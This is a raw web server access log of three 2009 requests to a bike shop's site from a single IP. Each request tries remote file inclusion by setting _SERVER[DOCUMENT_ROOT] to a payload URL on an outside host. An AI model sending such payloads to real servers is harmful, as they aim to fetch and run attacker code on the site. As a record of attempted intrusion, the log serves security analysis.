222.236.47.182 - - [11/Dec/2009:06:14:28 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Dec/2009:06:14:28 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Dec/2009:06:14:47 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.bekrage.net/albums/id1.txt?? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
